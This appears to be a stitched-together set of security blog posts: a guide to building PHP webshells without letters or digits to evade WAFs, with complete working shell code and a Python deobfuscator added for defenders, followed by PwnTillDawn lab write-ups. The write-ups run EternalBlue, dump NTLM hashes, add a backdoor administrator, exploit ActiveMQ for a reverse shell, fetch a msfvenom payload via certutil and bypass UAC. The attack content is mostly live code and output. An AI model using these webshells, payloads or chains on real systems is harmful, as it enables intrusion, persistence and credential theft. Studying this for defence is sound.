bypass-waf-php-webshell-without-numbers-letters

[Bypass WAF] Php webshell without numbers and letters

To bypass a WAF, you can use a few techniques to rewrite your webshell.

Idea

First, let me lay out the idea. My core idea is to start from non-alphanumeric characters and, through a variety of transformations, construct any of the letters a-z. PHP allows a function to be called dynamically through a variable that holds its name, so we can splice together a function name such as "assert" and then execute it dynamically.

So the transformation method is the main point in solving this problem.

But before that, I need to talk about the difference between PHP 5 and PHP 7.

In PHP 5, assert is a function, so we can use $f='assert';$f(...); to dynamically execute arbitrary code.

In PHP 7, assert is no longer a function but a language construct (similar to eval), so it cannot be called dynamically through a variable function name, and the technique becomes a little more complicated. There is no need to worry too much, though: other functions, for example file_put_contents, can be called the same way to get a shell.

For convenience, PHP 5 is used as the environment here; the PHP 7 variants are left for you to explore on your own.

Method 1

This is the simplest method to think of. In PHP, XORing two strings yields another string (the XOR is applied byte by byte). So, to obtain a letter in a-z, we look for two non-alphanumeric characters whose XOR result is that letter.

Get the following results:

<?php
// %01, %13 ... stand for the raw bytes 0x01, 0x13 ... (written URL-encoded here for readability;
// the file itself contains the raw bytes, so no digit or letter appears in the source).
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);

The results are as follows:

Method 2

This method uses a small PHP trick; see the documentation: http://php.net/manual/en/language.operators.increment.php

PHP follows Perl’s convention when dealing with arithmetic operations on character variables and not C’s. For example, in PHP and Perl $a = ‘Z’; $a++; turns $a into ‘AA’, while in C a = ‘Z’; a++; turns a into ‘[‘ (ASCII value of ‘Z’ is 90, ASCII value of ‘[‘ is 91). Note that character variables can be incremented but not decremented and even so only plain ASCII alphabets and digits (a-z, A-Z and 0-9) are supported. Incrementing/decrementing other character variables has no effect, the original string is unchanged.

So, how do we get a variable holding the string 'a'?

Conveniently, the first letter of the string 'Array' is an uppercase A and the fourth letter is a lowercase a. In other words, we can obtain both an uppercase and a lowercase A, and by incrementing them we can reach every letter in a-z and A-Z.

In PHP, if you concatenate an array with a string, the array is converted to the string 'Array' (PHP also emits an "Array to string conversion" notice, which is what the @ in the code below suppresses):

Then take the first character of that string, and you have 'A'.

Using this technique, I wrote the following webshell (PHP function names are case-insensitive, so what we end up executing is ASSERT($_POST[_])):

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
 
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
 
$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

The @ may not be allowed, but it is not needed 😉: it only suppresses the conversion notice, and execution proceeds whether @ is present or not.
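As an added example for defenders (not code from the original post), the following Python script statically recovers the literal that each of the two constructions above produces, so a reviewer or WAF rule author can see "assert" and "_POST" even though neither string appears in the source. The embedded sample is the Method 1 shell copied from above; the string-increment simulation follows the Perl-style rule quoted from the manual in Method 2, and the SUSPICIOUS name list and the "time|host|user|command"-free helpers are my own assumptions.

```python
import re
import urllib.parse

# One ('..'^'..') XOR term or one '..' literal inside a '.'-joined PHP expression.
TERM = re.compile(r"\('([^']*)'\^'([^']*)'\)|'([^']*)'")
# A simple "$name = expr;" assignment.
ASSIGN = re.compile(r"\$(\w+)\s*=\s*([^;]+);")
# Function names worth flagging when they are spelled out this way (assumed list).
SUSPICIOUS = {"assert", "eval", "system", "passthru", "shell_exec", "exec", "file_put_contents"}

# Constructed sample: the Method 1 shell from the post, exactly as written there.
METHOD1_SHELL = r"""<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);
"""


def php_xor(a: bytes, b: bytes) -> bytes:
    """PHP's string ^ operator: byte-wise XOR, truncated to the shorter operand."""
    return bytes(x ^ y for x, y in zip(a, b))


def decode_xor_concat(expr: str) -> str:
    """Evaluate a PHP expression made only of XOR terms and literals joined by '.'.

    The post writes the control bytes URL-encoded ('%01' stands for raw byte 0x01),
    so both operands are URL-decoded before the XOR.  Anything else raises ValueError.
    """
    pieces, pos = [], 0
    for m in TERM.finditer(expr):
        if expr[pos:m.start()].strip(" .\t"):
            raise ValueError(f"unsupported expression: {expr!r}")
        if m.group(3) is not None:                       # plain '...' literal
            pieces.append(m.group(3).encode("latin-1"))
        else:                                            # ('x'^'y') term
            pieces.append(php_xor(urllib.parse.unquote_to_bytes(m.group(1)),
                                  urllib.parse.unquote_to_bytes(m.group(2))))
        pos = m.end()
    if not pieces or expr[pos:].strip(" .\t"):
        raise ValueError(f"unsupported expression: {expr!r}")
    return b"".join(pieces).decode("latin-1")


def recover_literals(php_source: str) -> dict:
    """Map every statically decodable '$var = expr;' in the source to its literal value."""
    src = re.sub(r"//[^\n]*", "", php_source)           # drop the post's own comments first
    found = {}
    for name, expr in ASSIGN.findall(src):
        try:
            found["$" + name] = decode_xor_concat(expr.strip())
        except ValueError:
            pass                                         # $$__, $_['!'=='@'] ...: not static
    return found


def hidden_dangerous_names(php_source: str) -> list:
    """Recovered literals that name a code-execution or file-write function."""
    return sorted(v for v in recover_literals(php_source).values() if v.lower() in SUSPICIOUS)


def php_increment(s: str) -> str:
    """Simulate PHP's ++ on a string: Perl-style, 'z' -> 'aa', 'Az' -> 'Ba', '9' carries as '1'."""
    chars, carry = list(s), ""
    for i in range(len(chars) - 1, -1, -1):
        c = chars[i]
        if c == "z":
            chars[i], carry = "a", "a"
        elif c == "Z":
            chars[i], carry = "A", "A"
        elif c == "9":
            chars[i], carry = "0", "1"
        elif c.isascii() and c.isalnum():
            chars[i] = chr(ord(c) + 1)
            return "".join(chars)
        else:                                            # PHP stops at a non-alphanumeric character
            return "".join(chars)
    return carry + "".join(chars)


def letter_from_increments(line: str, start: str = "A") -> str:
    """Decode one Method 2 line: apply as many ++ as the line contains to a copy of `start`."""
    s = start
    for _ in range(line.count("++")):
        s = php_increment(s)
    return s


if __name__ == "__main__":
    print(recover_literals(METHOD1_SHELL))               # {'$_': 'assert', '$__': '_POST'}
    print(letter_from_increments("$__++;" * 18))         # S
```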

ptd-mrblue-private

As always, we start with an nmap scan.

# Nmap 7.80 scan initiated Wed Aug 26 10:02:31 2020 as: nmap -Pn -oN 242.nmap 10.150.150.242
Nmap scan report for 10.150.150.242
Host is up (0.031s latency).
Not shown: 986 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown

# Nmap done at Wed Aug 26 10:02:39 2020 -- 1 IP address (1 host up) scanned in 8.18 seconds
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $


msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.150.150.242
rhost => 10.150.150.242
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.150.150.242
rhosts => 10.150.150.242
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.66.66.210:4444
[*] 10.150.150.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.150.150.242:445 - Connecting to target for exploitation.
[+] 10.150.150.242:445 - Connection established for exploitation.
[+] 10.150.150.242:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.150.150.242:445 - CORE raw buffer dump (53 bytes)
[*] 10.150.150.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.150.150.242:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.150.150.242:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P
[*] 10.150.150.242:445 - 0x00000030 61 63 6b 20 31 ack 1
[+] 10.150.150.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.150.150.242:445 - Trying exploit with 12 Groom Allocations.
[*] 10.150.150.242:445 - Sending all but last fragment of exploit packet
[*] 10.150.150.242:445 - Starting non-paged pool grooming
[+] 10.150.150.242:445 - Sending SMBv2 buffers
[+] 10.150.150.242:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.150.150.242:445 - Sending final SMBv2 buffers.
[*] 10.150.150.242:445 - Sending last fragment of exploit packet!
[*] 10.150.150.242:445 - Receiving response from exploit packet
[+] 10.150.150.242:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.150.150.242:445 - Sending egg to corrupted connection.
[*] 10.150.150.242:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.150.150.242
[*] Meterpreter session 1 opened (10.66.66.210:4444 -> 10.150.150.242:51229) at 2020-08-26 10:09:19 +0100
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:483c7adb3e1378e9a187b42baa228745:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shell
Process 3660 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

c:\users\Administrator.GNBUSCA-W054\desktop>whoami
whoami
nt authority\system

c:\users\Administrator.GNBUSCA-W054\desktop>

c:\Users\Administrator.GNBUSCA-W054\Desktop>type FLAG34.txt
type FLAG34.txt
c2e9e102e55d5697ed2f9a7ea63708c1cc411b79
c:\Users\Administrator.GNBUSCA-W054\Desktop>

c:\Users\Administrator.GNBUSCA-W054\Desktop>net user /ADD puck Geheim2020
net user /ADD puck Geheim2020
The command completed successfully.

c:\Users\Administrator.GNBUSCA-W054\Desktop>net localgroup administrators /add puck
net localgroup administrators /add puck
The command completed successfully.

Connect with RDP:
┌─[✗]─[user@parrot-virtual]─[~/Downloads]
└──╼ $xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.242

Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.

ptd-elmariachi-pc-private

As always, I start with an nmap scan.

┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #nmap -Pn -p1-65535 10.150.150.69 -oN 69.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 11:42 BST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 69.38% done; ETC: 11:43 (0:00:18 remaining)
Nmap scan report for 10.150.150.69
Host is up (0.032s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5040/tcp open unknown
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
50417/tcp open unknown
60000/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 57.50 seconds
┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #

$xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.69

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 10.150.150.69:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.150.150.69:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

Password Brute-forcing using Nmap


ubuntu@ubuntu:~$ nmap --script smb-brute -p445 10.150.150.69 --script-args userdb=users.txt,passdb=passwords.txt

Install Nmap-Vulners
To install the nmap-vulners script, we’ll first use cd to change into the Nmap scripts directory.

cd /usr/share/nmap/scripts/
Then, clone the nmap-vulners GitHub repository by typing the below command into a terminal. That’s it for installing nmap-vulners. There’s absolutely no configuration required after installing it.

git clone https://github.com/vulnersCom/nmap-vulners.git

Cloning into 'nmap-vulners'...
remote: Counting objects: 28, done.
remote: Compressing objects: 100% (23/23), done.
remote: Total 28 (delta 9), reused 19 (delta 4), pack-reused 0
Unpacking objects: 100% (28/28), done.

On port 60000 we find ThinVNC: http://10.150.150.69:60000/
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rport 60000
rport => 60000
msf6 auxiliary(scanner/http/thinvnc_traversal) > run

[+] File ThinVnc.ini saved in: /root/.msf4/loot/20200826122605_default_10.150.150.69_thinvnc.traversa_219192.txt
[+] Found credentials: desperado:TooComplicatedToGuessMeAhahahahahahahh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/thinvnc_traversal) >

flag67 = 2971f3459fe55db1237aad5e0f0a259a41633962

However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to https://www.wizlynxgroup.com/  and https://online.pwntilldawn.com/  in your write-up.

ptd-hollywood-private

As always, we start with an nmap scan.

─[user@parrot-virtual]─[~/ptd]
└──╼ $nmap -Pn -p1-65535 10.150.150.219
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 08:55 BST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 80.05% done; ETC: 08:56 (0:00:07 remaining)
Nmap scan report for 10.150.150.219
Host is up (0.032s latency).
Not shown: 65502 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
25/tcp    open  smtp
79/tcp    open  finger
80/tcp    open  http
105/tcp   open  csnet-ns
106/tcp   open  pop3pw
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
443/tcp   open  https
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
1883/tcp  open  mqtt
2224/tcp  open  efi-mg
2869/tcp  open  icslap
3306/tcp  open  mysql
5672/tcp  open  amqp
8009/tcp  open  ajp13
8080/tcp  open  http-proxy
8089/tcp  open  unknown
8161/tcp  open  patrol-snmp
10243/tcp open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
49251/tcp open  unknown
61613/tcp open  unknown
61614/tcp open  unknown
61616/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 37.57 seconds
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $

 

Next we browse to http://10.150.150.219:8161/, which greets us with "Welcome to the Apache ActiveMQ!". There is an msf exploit for it: https://www.exploit-db.com/exploits/42283


msf6 exploit(windows/http/apache_activemq_traversal_upload) > show options

Module options (exploit/windows/http/apache_activemq_traversal_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD admin yes Password to authenticate with
PATH /fileserver/..\admin\ yes Traversal path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.150.150.219 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8161 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the web application
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.66.66.210 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.


Exploit target:

Id Name
-- ----
0 Windows Java


msf6 exploit(windows/http/apache_activemq_traversal_upload) > run

[*] Started reverse TCP handler on 10.66.66.210:4444 
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[+] Payload executed!
[*] Command shell session 1 opened (10.66.66.210:4444 -> 10.150.150.219:49284) at 2020-08-26 09:18:27 +0100

C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>whoami
whoami
hollywood\user

C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>

Next we create a meterpreter executable:

─[user@parrot-virtual]─[~/Downloads] $msfvenom -p windows/meterpreter/reverse_tcp lhost=10.66.66.210 lport=7777 -f exe > 7777.exe


─[✗]─[user@parrot-virtual]─[~/Downloads]
└──╼ $sudo python3 -m http.server 80
[sudo] password for user: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.150.150.219 - - [26/Aug/2020 09:25:00] "GET /7777.exe HTTP/1.1" 200 -
10.150.150.219 - - [26/Aug/2020 09:25:00] "GET /7777.exe HTTP/1.1" 200 -
c:\puck>certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.

c:\puck>dir
dir
Volume in drive C has no label.
Volume Serial Number is 021A-9C32

Directory of c:\puck

08/26/2020 05:21 PM <DIR> .
08/26/2020 05:21 PM <DIR> ..
08/26/2020 05:21 PM 73,802 7777.exe
1 File(s) 73,802 bytes
2 Dir(s) 44,543,938,560 bytes free

c:\puck>

Start the listener, and then execute 7777.exe from the c:\puck> prompt:

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.66.66.210
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.66.66.210:7777 
msf6 exploit(multi/handler) >


msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

c:\puck>7777.exe
7777.exe

c:\puck>
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 2 opened (10.66.66.210:7777 -> 10.150.150.219:49293) at 2020-08-26 09:32:53 +0100


c:\puck>
c:\puck>^Z
Background session 1? [y/N] y
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
2 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)

msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > hashdump 
[-] 2007: Operation failed: The parameter is incorrect.
meterpreter > 


meterpreter > shell
Process 5088 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\puck>whoami
whoami
hollywood\user

c:\puck>
c:\puck>^Z
Background channel 1? [y/N] y
meterpreter > 
Background session 2? [y/N] 
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester


msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.150.150.219 - Collecting local exploits for x86/windows...

[*] 10.150.150.219 - 34 exploit checks are being tried...
[+] 10.150.150.219 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.150.150.219 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 2
session => 2
msf6 exploit(windows/local/bypassuac_eventvwr) > run

[-] Handler failed to bind to 10.66.66.210:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\System32\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 3 opened (10.66.66.210:4444 -> 10.150.150.219:49300) at 2020-08-26 09:44:50 +0100

[*] Cleaning up registry keys ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_eventvwr) > 
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell java/linux Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
2 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)
3 meterpreter x86/windows HOLLYWOOD\User @ HOLLYWOOD 10.66.66.210:4444 -> 10.150.150.219:49300 (10.150.150.219)

msf6 exploit(windows/local/bypassuac_eventvwr) >
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 
4 0 System x86 0 
244 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
328 312 csrss.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
364 3876 xampp-control.exe x86 1 HOLLYWOOD\User C:\xampp\xampp-control.exe
400 3876 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
408 312 wininit.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
416 400 csrss.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
464 400 winlogon.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
512 408 services.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
520 408 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
528 408 lsm.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
624 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
684 512 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
728 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
816 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
864 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
892 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
916 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1028 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1200 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1224 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1384 512 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1412 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1504 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1612 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
1664 512 splunkd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
1700 512 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe
1728 328 conhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
1760 512 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1816 512 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1832 624 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe
1880 364 mysqld.exe x86 1 HOLLYWOOD\User c:\xampp\mysql\bin\mysqld.exe
2240 512 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe
2520 1664 splunk-winevtlog.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
2640 364 FileZillaServer.exe x86 1 HOLLYWOOD\User c:\xampp\filezillaftp\filezillaserver.exe
2676 364 mercury.exe x86 1 HOLLYWOOD\User c:\xampp\MercuryMail\mercury.exe
2748 400 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Oracle\Java\javapath\java.exe
2824 3876 jusched.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Java\Java Update\jusched.exe
2908 3916 httpd.exe x86 1 HOLLYWOOD\User C:\xampp\apache\bin\httpd.exe
2992 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
3008 2748 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
3124 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3156 3876 vmtoolsd.exe x86 1 HOLLYWOOD\User C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3472 364 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\System32\cmd.exe
3548 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe
